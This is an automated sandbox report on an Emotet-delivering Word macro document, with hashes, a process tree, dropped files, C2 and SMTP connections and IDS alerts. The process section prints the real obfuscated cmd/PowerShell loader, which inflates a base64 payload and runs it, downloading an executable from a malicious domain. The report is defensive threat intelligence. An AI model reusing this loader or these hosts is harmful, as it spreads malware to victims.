analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Invoice_No_URY_S5829078.doc

Full analysis: https://app.any.run/tasks/9a313708-2600-4d30-8b3d-22c2352c177b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 08, 2018, 13:04:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
maldoc-4
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Levi-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 8 11:05:00 2018, Last Saved Time/Date: Thu Nov 8 11:05:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

86E5D4D7C481B643DD561D5A89106B0B

SHA1:

1C8932BA2C7DD4ECD4CF9C1BB2D4E062D413E062

SHA256:

1B70D7E452D68EEE61465EDC3C8ADCD7CF4A1EC155E8DDFE846DB68C6807F9A0

SSDEEP:

768:Lb0VVucRFoqkp59YBvLdTv9ReVi4eFov5UHRFBt+1o9HJ7NYHbsTemkh:L4Vocn1kp59gxBK85fBt+a97cz

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 4048)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 4048)
    • Application was dropped or rewritten from another process

      • 940.exe (PID: 3552)
      • 940.exe (PID: 2416)
      • lpiograd.exe (PID: 1744)
      • lpiograd.exe (PID: 1224)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2120)
    • Emotet process was detected

      • lpiograd.exe (PID: 1224)
    • EMOTET was detected

      • lpiograd.exe (PID: 1744)
    • Changes the autorun value in the registry

      • lpiograd.exe (PID: 1744)
    • Connects to CnC server

      • lpiograd.exe (PID: 1744)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • CMD.exe (PID: 3748)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2120)
      • 940.exe (PID: 3552)
    • Creates files in the user directory

      • powershell.exe (PID: 2120)
    • Starts itself from another location

      • 940.exe (PID: 3552)
    • Connects to unusual port

      • lpiograd.exe (PID: 1744)
    • Connects to SMTP port

      • lpiograd.exe (PID: 1744)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4048)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 4048)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:11:08 11:05:00
CreateDate: 2018:11:08 11:05:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: Levi-PC
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe 940.exe no specs 940.exe #EMOTET lpiograd.exe no specs #EMOTET lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
4048"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Invoice_No_URY_S5829078.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3748CMD cMD.EXE/c"sET yXu= (New-obJeCT Io.COMprESsiON.defLaTEstREaM( [sYstem.IO.MEMORYstreaM] [CONvert]::FROMBaSe64STrIng( 'NZBRT8IwFIX/yh6aFIJ0BjEGmiUoiMFERJboiy+37WVUunZu3SoS/ruwyOv5zv2Se8jLw3diMfSd+ELpoyV69oFiajRaz8l6FhK69b4Yx3EOSlfOKmDS5fHKyvC8TNPJPwVvoOobEKysY+3c6maks+ZCc52VINvDqXifP1evg9u7C6wKhF0otUeGqmYFxgZsVkOG8ZOwj2WRiks1hMBEbZVBpRBMK1QNLvfr9XBAWVoY7Tt0Qruc/N5voiSio+E15WRjdULQNmOPedGjn7R35j3K8Acp37gSQW47JH3LI22j89vdgy/3B3Kah81csMaBmmuDbecqOgu7fGEbt8P+4iRtEy5Onh0/SvByezge/wA=' ), [Io.COmpresSIoN.cOmpREssIOnmodE]::DEcomPRESS ) ^|% { New-obJeCT SYSTem.io.stReamReaDER( $_ ,[SYSteM.TExT.encOdING]::ascII)} ).reaDtoend() ^|invOkE-EXPrESsiOn&& poweRSheLL Sv ( 'h' + 'e87r' ) ( [tyPe](\"{2}{3}{1}{0}\"-f 't','rONmEN','env','I' ) ) ; .( \"{3}{2}{1}{0}\" -f 'SIon','-ExpreS','Ke','iNvO' ) ( ( ${He8`7r}::(\"{2}{3}{0}{1}\" -f 'OnMenTV','ArIaBle','GeTeN','vIr' ).Invoke( 'YxU',(\"{2}{0}{1}\" -f 'Es','s','pRoc' ))) )" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2120poweRSheLL Sv ( 'h' + 'e87r' ) ( [tyPe](\"{2}{3}{1}{0}\"-f 't','rONmEN','env','I' ) ) ; .( \"{3}{2}{1}{0}\" -f 'SIon','-ExpreS','Ke','iNvO' ) ( ( ${He8`7r}::(\"{2}{3}{0}{1}\" -f 'OnMenTV','ArIaBle','GeTeN','vIr' ).Invoke( 'YxU',(\"{2}{0}{1}\" -f 'Es','s','pRoc' ))) )C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2416"C:\Users\admin\AppData\Local\Temp\940.exe" C:\Users\admin\AppData\Local\Temp\940.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
3552"C:\Users\admin\AppData\Local\Temp\940.exe"C:\Users\admin\AppData\Local\Temp\940.exe
940.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
1224"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
940.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Exit code:
0
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
1744"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Norwegian with Sami Keyboard Layout
Version:
5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
Total events
1 684
Read events
1 269
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
4048WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9B51.tmp.cvr
MD5:
SHA256:
2120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y6UOGEWKXHZD9K6UXFCN.temp
MD5:
SHA256:
4048WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:EAD40168CD6328019291DD00BEDCE23A
SHA256:1A1B47D1DD1AB828BF8A3064D7280E9274A454E99D50EB0E1F26FB497B639620
2120powershell.exeC:\Users\admin\AppData\Local\Temp\940.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
3552940.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:6823E6E9A4321CFDA0767502921358E3
SHA256:63B0ECC943FCE32C509E12AF374918B7D0C9C65663F5B2E100FACC2FAEE1DC81
4048WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$voice_No_URY_S5829078.docpgc
MD5:4218DA0086997188949BF309F708D06F
SHA256:C38FC1FDB4DC2E3209F46C52FF302C6793163E352D48C75CAE5B6BBA5FAFE34E
2120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da92c.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2120powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
157
DNS requests
131
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1744
lpiograd.exe
GET
50.121.220.115:80
http://50.121.220.115/
US
malicious
1744
lpiograd.exe
GET
47.157.181.81:443
http://47.157.181.81:443/
US
malicious
1744
lpiograd.exe
GET
24.216.53.12:80
http://24.216.53.12/
US
malicious
2120
powershell.exe
GET
301
173.201.98.1:80
http://madisonda.com/PncwJNSS
US
html
301 b
malicious
2120
powershell.exe
GET
200
173.201.98.1:80
http://madisonda.com/PncwJNSS/
US
executable
792 Kb
malicious
1744
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
714 Kb
malicious
1744
lpiograd.exe
GET
200
187.163.174.149:8080
http://187.163.174.149:8080/
MX
binary
148 b
malicious
1744
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/
US
binary
50.1 Kb
malicious
1744
lpiograd.exe
GET
200
72.47.209.128:8080
http://72.47.209.128:8080/
US
binary
50.2 Kb
malicious
1744
lpiograd.exe
GET
200
47.157.181.81:443
http://47.157.181.81:443/
US
binary
50.1 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1744
lpiograd.exe
47.157.181.81:443
Frontier Communications of America, Inc.
US
malicious
1744
lpiograd.exe
212.227.15.183:465
smtp.1und1.de
1&1 Internet SE
DE
malicious
2120
powershell.exe
173.201.98.1:80
madisonda.com
GoDaddy.com, LLC
US
malicious
1744
lpiograd.exe
64.37.48.8:465
mail.intaca.com.co
HostDime.com, Inc.
US
unknown
1744
lpiograd.exe
186.64.118.160:25
mail.sinergika.cl
ZAM LTDA.
CL
suspicious
1744
lpiograd.exe
216.97.227.55:587
mail.secorvep.com.ar
Lunar Pages
US
unknown
1744
lpiograd.exe
192.185.120.83:25
mail.induworker.com
CyrusOne LLC
US
unknown
1744
lpiograd.exe
81.169.145.103:465
imap.strato.de
Strato AG
DE
unknown
1744
lpiograd.exe
187.163.174.149:8080
Axtel, S.A.B. de C.V.
MX
malicious
1744
lpiograd.exe
66.96.130.1:465
smtp.ipower.com
The Endurance International Group, Inc.
US
unknown

DNS requests

Domain
IP
Reputation
madisonda.com
  • 173.201.98.1
malicious
internal-mail.x.x
unknown
mail.induworker.com
  • 192.185.120.83
unknown
mail.secorvep.com.ar
  • 216.97.227.55
unknown
mail.sinergika.cl
  • 186.64.118.160
suspicious
mail.intaca.com.co
  • 64.37.48.8
unknown
mail.escueladeparvuloselcastillo.cl
  • 186.64.117.140
unknown
tspcorreo.sanchezpolo.com
  • 190.217.96.100
unknown
smtp.ipower.com
  • 66.96.130.1
shared
smtp-mail.outlook.com
  • 52.97.133.210
  • 40.100.174.2
  • 52.97.129.226
  • 52.97.129.66
shared

Threats

PID
Process
Class
Message
2120
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader
2120
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2120
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2120
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1744
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1744
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1744
lpiograd.exe
A Network Trojan was detected
SC SPYWARE Trojan-Banker.Win32.Emotet
1744
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1744
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1744
lpiograd.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
8 ETPRO signatures available at the full report
No debug info